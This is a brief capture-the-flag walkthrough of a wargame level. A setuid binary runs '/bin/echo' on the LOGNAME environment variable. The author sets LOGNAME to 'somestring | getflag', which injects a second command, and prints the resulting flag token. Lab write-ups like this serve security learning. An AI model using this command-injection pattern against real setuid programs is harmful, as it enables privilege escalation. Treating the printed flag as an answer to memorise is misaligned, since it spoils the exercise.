In home folder we can find file owned by `flag07` user.  
Command: `ls -l`  
Output:
```
total 12
-rwsr-sr-x 1 flag07 level07 8805 Mar  5  2016 level07
```

Investigating `level07` binary shows that it just get enviroment variable `LOGNAME` and execute `/bin/echo %s` on it.

So we can easily exploit it.

Command: `export LOGNAME="somestring | getflag"`  
Output: `Check flag.Here is your token : fiumuikeil55xe9cu4dood66h`

Flag: `fiumuikeil55xe9cu4dood66h`